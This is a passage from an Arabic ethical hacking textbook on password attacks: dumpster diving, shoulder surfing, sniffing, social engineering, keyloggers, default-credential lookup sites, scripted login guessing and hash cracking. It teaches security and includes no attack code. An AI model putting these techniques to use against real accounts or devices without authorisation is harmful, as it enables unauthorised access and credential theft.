‫ﺑﺑﺳﺎطﺔ‪ ،‬ﻓﺣص اﻟﻧﻔﺎﯾﺎت اﻟﺗﻲ ﺗم إﻟﻘﺎﺋﮭﺎ ﻓﻲ اﻟﻘﻣﺎﻣﺔ ﻗد ﺗﻛون ﻣﻔﯾدة ﻟﻠﻣﮭﺎﺟﻣﯾن‪ ،‬وھﻧﺎك ﻣﻌﻠوﻣﺎت واﻓرة ﻟدﻋم ھذا اﻟﻣﻔﮭوم‪ .‬ﻣﺛل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﻔﯾدة‬
‫اﻟﺗﻲ أﻟﻘﯾت ﺑدون أي ﺗﻔﻛﯾر اﻟﻰ أي ﻣن اﻷﯾدي اﻟﺗﻲ ﻗد ﯾﻧﺗﮭﻲ اﻟﯾﮭﺎ‪ .‬ھذه اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻟﻠوﺻول ﻏﯾر اﻟﻣﺻرح ﺑﮫ‬
‫اﻟﻰ أﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻵﺧرﯾن‪ ،‬أو ﯾﻣﻛن اﻷﺷﯾﺎء اﻟﺗﻲ ﯾﻌﺛر ﻋﻠﯾﮭﺎ ﯾدﻓﻊ اﻟﻰ أﻧواع أﺧرى ﻣن اﻟﮭﺟﻣﺎت ﻣﺛل اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪334‬‬

‫‪ Shoulder Surfing‬ﻋﻧدھﺎ ﯾﻛون اﻟﻣﺗﺳﻠل واﻗف ﺑﺻورة ﻏﯾر واﺿﺣﺔ ‪ ،‬وﻟﻛن ﺑﺎﻟﻘرب ﻣن اﻟﻣﺳﺗﺧدم اﻟﺷرﻋﻲ ﻟﻠﻧظﺎم ‪ ،‬وﻣﺷﺎھدة ﻛﯾف ﯾﺗم‬
‫إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور‪ .‬اﻟﻣﮭﺎﺟم ﺑﺑﺳﺎطﺔ ﯾﻧظر إﻟﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺳواء ﻟﻠﻣﺳﺗﺧدم أو اﻟﺷﺎﺷﺔ ﺑﯾﻧﻣﺎ ھو ﯾﺳﺟل اﻟدﺧول‪ ،‬وﯾراﻗب ﻟﯾرى ﻣﺎ إذا ﻛﺎن‬
‫اﻟﻣﺳﺗﺧدم ﯾﺣدق ﻓﻲ اﻟﻣﻛﺗب ﻟﯾﺗذﻛر ﻛﻠﻣﺔ اﻟﻣرور أو ﻛﻠﻣﺔ اﻟﻣرور اﻟﻔﻌﻠﯾﺔ‪ .‬ھذا ﯾﻣﻛن أن ﯾﻛون ﻣﻣﻛﻧﺎ ﻓﻘط ﻋﻧدﻣﺎ ﯾﻛون اﻟﻣﮭﺎﺟم ھو ﺟﺳدﯾﺎ ﻗرﯾب‬
‫ﻣن اﻟﮭدف‪ .‬ﯾﻣﻛن أن ﯾﺣدث ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم أﯾﺿﺎ ﻓﻲ ﻣﺣل اﻟﺑﻘﺎﻟﺔ ﻋﻧد ﺧط اﻟﺧروج ﻋﻧدﻣﺎ ﯾﻘوم اﻟﺿﺣﯾﺔ اﻟﻣﺣﺗﻣﻠﺔ ﺑﺗﻣرﯾر ﺑطﺎﻗﺔ اﻟﺳﺣب‬
‫اﻵﻟﻲ وإدﺧﺎل ‪ PIN‬اﻟﻣطﻠوﺑﺔ‪ .‬اﻟﻌدﯾد ﻣن ارﻗﺎم اﻟﮭوﯾﺔ اﻟﺷﺧﺻﯾﺔ ھذه ھﻲ ﻋﺑﺎره ﻋن أرﺑﻌﺔ ارﻗﺎم ﻓﻘط‪.‬‬
‫ﯾﺷﯾر اﻟﺗﻧﺻت )‪ (Eavesdropping‬ﻋﻠﻰ ﻓﻌل اﻻﺳﺗﻣﺎع ﺳرا ﻟﻣﺣﺎدﺛﺔ ﺷﺧص ﻣﺎ‪ .‬ﯾﻣﻛن ﺗﺣدﯾد ﻛﻠﻣﺎت اﻟﺳر ﻣن ﺧﻼل اﻻﺳﺗﻣﺎع ﺳرا ﻟﺗﺑﺎدﻻت‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ .‬إذا ﻓﺷل اﻟﮭﺎﻛر ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ اﻟﺗﺧﻣﯾن‪ ،‬ﻓﮭﻧﺎك طرق أﺧرى ﯾﻣﻛﻧﮫ اﻟﻣﺣﺎوﻟﺔ ﻟﻠﺣﺻول ﻋﻠﯾﮫ‪.‬‬
‫" ‪ " Password sniffing‬ھو ﺑدﯾل ﻣﺳﺗﺧدم ﻣن ﻗﺑل اﻟﻣﺗﺳﻠﻠﯾن ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺳﺗﮭدﻓﺔ‪.‬‬
‫ﻣﻌظم اﻟﺷﺑﻛﺎت ﺗﺳﺗﺧدم ﺗﻘﻧﯾﺔ اﻟﺑث )‪ ،(Broadcast technology‬ﻣﻣﺎ ﯾﻌﻧﻲ أن ﻛل رﺳﺎﻟﺔ ﯾﻘوم اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﻧﻘﻠﮭﺎ ﯾﻣﻛن ﻗراءﺗﮭﺎ‬
‫ﻣن ﻗﺑل أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﺗﺻل ﻋﻠﻰ ﺗﻠك اﻟﺷﺑﻛﺔ‪ .‬ﻓﻲ اﻟﻣﻣﺎرﺳﺔ اﻟﻌﻣﻠﯾﺔ‪ ،‬ﻣﺎ ﻋدا ﻣﺳﺗﻠم اﻟرﺳﺎﻟﺔ‪ ،‬ﻓﺈن ﻛل أﺟﮭزة ﻛﻣﺑﯾوﺗر ﻣوﺟود ﻋﻠﻰ اﻟﺷﺑﻛﺔ‬
‫ﯾﻼﺣظ ان اﻟرﺳﺎﻟﺔ ﻏﯾر ﻣوﺟﮫ اﻟﯾﮫ‪ ،‬وﯾﺗﺟﺎھﻠﮭﺎ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺄن أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﯾﻣﻛن ﺑرﻣﺟﺗﮭﺎ ﻟﻠﻧظر ﻓﻲ ﻛل رﺳﺎﻟﺔ اﻟﺗﻲ ﺗﻧﺗﻘل ﻋن طرﯾﻖ‬
‫ﻛﻣﺑﯾوﺗر ﻣﻌﯾن ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬ﺑﮭذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﻣرء أن ﯾﻧظر إﻟﻰ اﻟرﺳﺎﺋل اﻟﺗﻲ ﻟم ﺗﻛن ﻣوﺟﮭﺔ اﻟﯾﮫ‪ .‬اﻟﻘراﺻﻧﺔ ﻟدﯾﮭم ﺑراﻣﺞ ﻟﻠﻘﯾﺎم ﺑذﻟك‪،‬‬
‫وﻣن ﺛم ﻓﺣص ﻛﺎﻓﺔ اﻟرﺳﺎﺋل اﻟﺗﻲ اﺟﺗﺎزت اﻟﺷﺑﻛﺔ ﻣن أﺟل اﻟﺑﺣث ﻋن ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﻗد ﺗﻛون ﻧﮭﺎﯾﺔ اﻟﻣطﺎف ﺑﺈﻋطﺎء ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‬
‫إﻟﻰ اﻟﻣﮭﺎﺟم إذا ﻛﻧت ﺗﻘوم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻋﺑر اﻟﺷﺑﻛﺔ‪ ،‬وﻟﻘد ﺗم اﺧﺗراق ﺑﻌض أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﮭذه اﻟطرﯾﻘﺔ‪.‬‬
‫ﺑﺎﺳﺗﺧدام ھذه اﻟﺗﻘﻧﯾﺔ ‪ ،password sniffing technique‬ﻓﺎن اﻟﻣﺗﺳﻠﻠﯾن ﻗد ﺟﻣﻌوا اﻵﻻف ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻋن طرﯾﻖ اﻗﺗﺣﺎم أﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺗﺻﻠﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﺑﻛﺛرة‪.‬‬

‫اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ)‪ : (Social Engineering‬ﻓﻲ اﻣن اﻟﻛوﻣﺑﯾوﺗر‪ ،‬اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ھو اﻟﻣﺻطﻠﺢ اﻟذي ﯾﻣﺛل ﻧوﻋﺎ ﻏﯾر ﺗﻘﻧﻲ ﻣن‬
‫اﻟﺗﺳﻠل‪ .‬ﻋﺎدة‪ ،‬ھذا ﯾﻌﺗﻣد ﺑﺷﻛل ﻛﺑﯾر ﻋﻠﻰ اﻟﺗﻔﺎﻋل ﺑﯾن اﻹﻧﺳﺎن وﯾﻧطوي ﻋﻠﻰ ﺧداع اﻵﺧرﯾن ﻓﻲ ﻛﺳر اﻹﺟراءات اﻷﻣﻧﯾﺔ اﻟﻣﻌﺗﺎدة ﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن‪ .‬ﯾﻌﻣل اﻟﻣﮭﻧدس اﻻﺟﺗﻣﺎﻋﻲ "ﻟﻌﺑﺔ ﺧداع" ﻟﻛﺳر اﻹﺟراءات اﻷﻣﻧﯾﺔ‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬أن ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑﺎﺳﺗﺧدام اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‬
‫ﻻﻗﺗﺣﺎم ﺷﺑﻛﺔ اﻟﻛﻣﺑﯾوﺗر ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻛﺳب ﺛﻘﺔ ﺷﺧص ﻣﺧول ﻟﻠوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ‪ ،‬ﺛم ﯾﺣﺎول اﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﮭدد أﻣن اﻟﺷﺑﻛﺎت‪.‬‬
‫اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ھﻲ اﻟﺗﺷﻐﯾل ﻣن ﺧﻼل ﺗدﺑﯾر اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣن ﻗﺑل اﻟﺧداع أو ‪ .swaying people‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﺣرﯾف ﻧﻔﺳﮫ ﺑﺄﻧﮫ‬
‫ﻣﺳﺗﺧدم أو ﻣﺳؤول اﻟﻧظﺎم ﻣن أﺟل اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻣن اﻟﻣﺳﺗﺧدم‪ .‬ﻓﻣن اﻟطﺑﯾﻌﻲ ﻟﻠﻧﺎس ان ﯾﻛوﻧوا ﻣﻔﯾدﯾن وﯾﺛﻘون‪ .‬أي ﺷﺧص‬
‫ﻋﻣوﻣﺎ ﯾﺟﻌل ﻣﺣﺎوﻟﺔ ﻟﺑﻧﺎء ﻋﻼﻗﺎت ودﯾﺔ ﻣﻊ أﺻدﻗﺎء ﻟﮫ أو اﻟزﻣﻼء‪ .‬ﻓﺎن اﻟﻣﮭﻧدﺳﯾن اﻻﺟﺗﻣﺎﻋﯾن ﯾﺳﺗﻔﺎدوا ﻣن ھذا اﻻﺗﺟﺎه‪.‬‬
‫اﻟﺳﻣﺔ أﺧرى ﻟﻠﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﺗﻌﺗﻣد ﻋﻠﻰ ﻋدم ﻗدرة اﻟﻧﺎس ﻋﻠﻰ ﻣواﻛﺑﺔ ھذه اﻟﺛﻘﺎﻓﺔ اﻟﺗﻲ ﺗﻌﺗﻣد ﺑﺷﻛل ﻛﺑﯾر ﻋﻠﻰ ﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻣﻌﻠوﻣﺎت‪ .‬ﻣﻌظم‬
‫اﻟﻧﺎس ﻟﯾﺳوا ﻋﻠﻰ ﺑﯾﻧﺔ ﻣن ﻗﯾﻣﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﻣﺗﻠﻛﮭﺎ وﻗﻠﯾﻼ ﻣﺎ ﯾﺗﮭﺎوﻧوا ﻓﻲ ﺣﻣﺎﯾﺗﮭﺎ‪ .‬اﻟﻣﮭﺎﺟﻣون ﯾﺳﺗﻔﺎدون ﻣن ھذه اﻟﺣﻘﯾﻘﺔ ﻟﻠﺗﺳﻠل‪ .‬ﻋﺎدة‪،‬‬
‫اﻟﻣﮭﻧدﺳﯾن اﻻﺟﺗﻣﺎﻋﯾﺔ ﯾﺑﺣﺛوا ﻓﻲ ﻣﻛﺑﺎت اﻟﻧﻔﺎﯾﺎت ﺑﺣث ﻋن ﻣﻌﻠوﻣﺎت ﻗﯾﻣﺔ‪ .‬أﻓﺿل دﻓﺎع ھو اﻟﺗﺛﻘﯾف‪ ،‬واﻟﺗدرﯾب‪ ،‬وﺧﻠﻖ اﻟوﻋﻲ‪.‬‬

‫‪ Keyboard Sniffing‬ﯾﺳﻣﺢ ﻟك ﺑﺗﻔﺳﯾر ﻛﻠﻣﺔ ﻣرور اﻟﺗﻲ ﯾدﺧﻠﮭﺎ اﻟﮭدف ﺑواﺳطﺔ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺑﺎﺳﺗﺧدام ‪.Keylogger‬‬

‫‪Default Passwords‬‬
‫اﻟﻣﺻدر‪http://securityoverride.org/default-password-list :‬‬
‫ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ھﻲ ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗوﻓرھﺎ اﻟﺷرﻛﺎت اﻟﻣﺻﻧﻌﺔ ﻣﻊ اﻟﻣﻌدات ﺟدﯾدة‪ .‬ﻋﺎدة ﻣﺎ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور اﻻﻓﺗراﺿﯾﺔ اﻟﺗﻲ‬
‫ﺗﻘدﻣﮭﺎ اﻟﺷرﻛﺎت اﻟﻣﺻﻧﻌﺔ ﻟﻸﺟﮭزة ﻛﻠﻣﺔ اﻟﺳر اﻟﻣﺣﻣﯾﺔ ﯾﺳﻣﺢ اﻟوﺻول اﻟﻰ اﻟﺟﮭﺎز أﺛﻧﺎء اﻹﻋداد اﻷوﻟﻲ‪ .‬أدوات اﻹﻧﺗرﻧت اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ‬
‫ﻟﻠﺑﺣث ﻋن ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ﻛﺎﻻﺗﻰ‪.‬‬
‫‪http://cirt.net‬‬
‫‪http://default-password.info‬‬
‫‪http://www.defaultpassword.us‬‬
‫‪http://www.passwordsdatabase.com‬‬
‫‪https://w3dt.net‬‬
‫‪http://www.virus.org‬‬
‫‪http://open-sez.me‬‬
‫‪http://securityoverride.org‬‬
‫‪http://www.routerpasswords.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪335‬‬

‫)‪Manual Password Cracking (Guessing‬‬


‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﯾدوﯾﺎ ﯾﺷﻣل ﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳﺗﺧدام ﻛﻠﻣﺎت ﻣرور ﻣﺧﺗﻠﻔﺔ‪ .‬اﻟﺗﺧﻣﯾن ھو اﻟﻌﻧﺻر اﻷﺳﺎﺳﻲ ﻣن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬
‫)‪ .(Manual Password Cracking‬ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﻣﻔﺗﺎح اﻟﺑﯾﺎﻧﺎت اﻟذي ﯾﻛون ھﻧﺎك اﻟﺣﺎﺟﺔ اﻟﯾﮫ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬ﻣﻌظم ﻛﻠﻣﺎت اﻟﺳر‬
‫ﯾﻣﻛن ﻛﺳرھﺎ ﺑﺎﺳﺗﺧدام اﻣﺗﯾﺎزات اﻟﺗﺻﻌﯾد اﻟﻣﺧﺗﻠﻔﺔ‪ ،‬وﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت‪ ،‬واﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ ،‬وﺗﻐطﯾﺔ اﻟﻣﺳﺎرات‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣون ﺑﺎﻟﻌدﯾد ﻣن‬
‫اﻟﻣﺣﺎوﻻت ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻻﻗﺗﺣﺎم اﻟﻧظﺎم اﻟﮭدف‪ .‬ﻛﻠﻣﺎت اﻟﺳر ﯾﻣﻛن ﻛﺳرھﺎ ﯾدوﯾﺎ أو ﺑﺎﺳﺗﺧدام ﺑﻌض اﻷدوات اﻵﻟﯾﺔ واﻷﺳﺎﻟﯾب‪،‬‬
‫واﻟﺧوارزﻣﯾﺎت‪ .‬ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﯾﻣﻛن ان ﯾﻛون اﻟﯾﺎ )‪ (Automated‬ﺑﺎﺳﺗﺧدام ‪ .simple FOR loop‬أﯾﺿﺎ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﯾدوﯾﺎ‬
‫وﯾﺷﻣل ﻣﺣﺎوﻻت ﻣﺧﺗﻠﻔﺔ ﻟﺗﺳﺟﯾل اﻟدﺧول ﻛﻣﺎ ﻓﻲ اﻟطرق اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ‪.‬‬
‫‪ -‬إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪.‬‬
‫‪ -‬ﺗرﺗﯾب ﻛﻠﻣﺎت اﻟﺳر ﻣن اﺣﺗﻣﺎﻟﯾﮫ ﻣرﺗﻔﻌﺔ اﻟﻰ ﻣﻧﺧﻔﺿﮫ‪.‬‬
‫‪ -‬ﻣﻔﺗﺎح ﻓﻲ ﻛل ﻛﻠﻣﺔ ﻣرور‪ ،‬ﺣﺗﻰ ان ﺗم اﻛﺗﺷﺎف ﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﺔ‬
‫اﻟﻘراﺻﻧﺔ ﯾﻣﻛﻧﮭم أﯾﺿﺎ إﻧﺷﺎء ﻣﻠف ﺳﻛرﯾﺑت وظﯾﻔﺗﮫ ﻣﺣﺎوﻟﺔ اﺳﺗﺧدام ﻛل ﻛﻠﻣﺔ ﻓﻲ اﻟﻘﺎﺋﻣﺔ‪ .‬وﻟﻛن ﻻ ﯾزال ھذا ﻧوع ﻣن أﻧواع ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬
‫ﯾدوﯾﺎ‪ .‬ﻣﻌدل ﻓﺷل ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻋﺎﻟﻲ‪.‬‬
‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﯾدوﯾﺎ )‪(Manual‬ﻋن طرﯾﻖ اﻟﺗﺧﻣﯾن ﯾﻣﻛﻧﮫ ان ﯾﺻﺑﺢ ‪ Automated‬ﺑﺎﺳﺗﺧدام ﺑﺳﯾط ﻟﻠﺣﻠﻘﺔ)‪ . (For loop‬ﻓﻲ اﻟﻣﺛﺎل‬
‫اﻟﺗﺎﻟﻲ‪ ،‬اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف ﻧﺻﻲ ﻣﻊ أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﺗﻛرارھﺎ ﺑﺎﺳﺗﺧدام ‪.FOR loop‬‬

‫ﺣﻠﻘﺔ ‪ For loop‬اﻟرﺋﯾﺳﯾﺔ ﯾﻣﻛﻧﮭﺎ اﺳﺗﺧراج أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﺳر ﻣن ﻣﻠف اﻟﻧص اﻟﺗﻲ ھﻲ ﺑﻣﺛﺎﺑﺔ اﻟﻘﺎﻣوس ﻷﻧﮭﺎ ﺗﺗﻛرر ﻣن ﺧﻼل‬
‫ﻛل ﺳطر‪:‬‬

‫ﯾﺣﺗوي اﻟﻣﻠف ‪ outfile.txt‬ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﯾن‪ .‬إذا ﻛﺎن اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ اﻟﻣﻠف‬
‫‪ credentials.txt‬ﺻﺣﯾﺣﺔ‪ .‬إذا ﻓﺎﻧﮫ ﯾﻣﻛن ﺗﺄﺳﯾس ﺟﻠﺳﺔ ﻣﻔﺗوﺣﺔ ﻣﻊ ﺧﺎدم اﻟﺿﺣﯾﺔ ﺑﺎﺳﺗﺧدام ﻧظﺎم اﻟﻣﮭﺎﺟم‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪336‬‬

‫‪Automatic Password Cracking‬‬

‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن‪ .‬ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول‬
‫اﻟﻰ ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬

‫إذا ﻛﻧت ﻧﺳﺗطﯾﻊ اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف‪ ،‬ﻓﺎن ھﻧﺎك اﺣﺗﻣﺎﻻت ﺟﯾدة ﻣﻊ ﻣﺎ ﯾﻛﻔﻲ ﻣن اﻟوﻗت‪ ،‬ﻓﯾﻣﻛﻧك ﻛﺳر ﻛﻠﻣﺔ‬
‫اﻟﺳر‪ ،‬ﺣﯾث ﯾﻣﻛن اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ھﺎش ﻛﻠﻣﺔ اﻟﻣرور )‪ (Password hash‬ھﻲ ﻧﺳﺧﮫ ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻟﻌﺎدﯾﺔ‪ .‬اﻟﮭﺎش ھﻲ ﻋﺎدة ﻣﺎ ﺗﻛون أﻛﺛر ﻣن ﻣﺟرد إﻋﺎدة ﺗرﺗﯾب ﻛﻠﻣﺔ اﻟﻣرور اﻷﺻﻠﯾﺔ‪ .‬وھﻲ ﻋﺎدة ﻣﺎ ﺗﻛون ھﺎش ﻓﻲ اﺗﺟﺎه واﺣد‪.‬‬
‫اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد ھو ﺳﻠﺳﻠﺔ ﻣن اﻷﺣرف اﻟﺗﻲ ﻻ ﯾﻣﻛن ﻋﻛﺳﮭﺎ إﻟﻰ ﻧص أﺻﻠﻲ‪.‬‬
‫وﻣﻊ ذﻟك‪ ،‬ﻻ ﺗﻧﺷﺄ ﻧﻘﺎط ﺿﻌف ﻣن ﻋﻣﻠﯾﺔ اﻟﮭﺎش ﻧﻔﺳﮭﺎ‪ ،‬وﻟﻛن ﻣن ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻻ ﯾﺗم ﻓك ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ وﻗت‬
‫اﻟﻣﺻﺎدﻗﺔ ﻣن ﻗﺑل ﻣﻌظم اﻷﻧظﻣﺔ‪ .‬ھذه اﻟﻧظم ﺗﺧزن ﻓﻘط اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد‪.‬‬

‫أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺣﻠﯾﺔ‪ ،‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﯾﺗم إدﺧﺎﻟﮭﺎ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻣن ﺧﻼل ﺧوارزﻣﯾﺔ ﺗوﻟﯾد اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد وﻣﻘﺎرﻧﺗﮭﺎ‬
‫ﺑﺎﻟﮭﺎش اﻟﻣﺧزن ﻋﻠﻰ اﻟﻧظﺎم‪ .‬إذا وﺟدا ﺗﺷﺎﺑﮭﮫ ﺑﯾﻧﮭم‪ ،‬إذا ﻓﮭذه ﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﺔ اﻟﺗﻲ ﺗم اﺳﺗﺧداﻣﮭﺎ‪ .‬ﻟذﻟك‪ ،‬ﻛل ﻣﺎ ﻟدي اﻟﻣﮭﺎﺟﻣﯾن اﻟﻘﯾﺎم ﺑﮫ‬
‫ﻣن أﺟل ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ھو اﻟﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد اﻟﻣﺧزﻧﺔ ﻋﻠﻰ اﻟﺧﺎدم‪ ،‬وﻣن ﺛم اﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗوﻟﯾد اﻟﮭﺎش‬
‫اﻟﺧﺎﺻﺔ ﺑﮫ ﺣﺗﻰ ﯾﺣﺻل ﻋﻠﻰ ﺗطﺎﺑﻖ‪ .‬ﻣﻌظم أﻧظﻣﺔ ﻣﺎﯾﻛروﺳوﻓت‪ ،‬وﯾوﻧﯾﻛس‪ ،‬و ‪Netware‬ﻗد أﻋﻠﻧوا ﻋﻠﻰ اﻟﻣﻸ ﺧوارزﻣﯾﺎت اﻟﮭﺎش اﻟﺧﺎﺻﺔ‬
‫ﺑﮭم‪ .‬ھذا اﻟﮭﺎش ﯾﻣﻛن اﻟوﺻول اﻟﯾﮫ إﻣﺎ ﻋن ﺑﻌد أو ﻣﺣﻠﯾﺎ‪ .‬ﺑﻐض اﻟﻧظر ﻋن ﻛﯾف ﯾﻣﻛﻧﻧﺎ اﻟوﺻول إﻟﻰ اﻟﮭﺎش‪ ،‬ﻓﺎن اﻟﺧطوات واﻷدوات اﻟﻼزﻣﺔ‬
‫ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻻ ﺗزال ھﻲ ﻧﻔﺳﮭﺎ‪.‬‬
‫ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام ﻣزﯾﺞ ﻣن أﺳﺎﻟﯾب اﻟﮭﺟوم ﻟﻠﺣد ﻣن اﻟوﻗت اﻟذي ﯾطﻠﺑﮫ ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور‪ .‬ﯾوﻓر اﻹﻧﺗرﻧت ﺗطﺑﯾﻘﺎت ﻣﺟﺎﻧﯾﺔ ﻟﻛﺳر ﻛﻠﻣﺔ‬
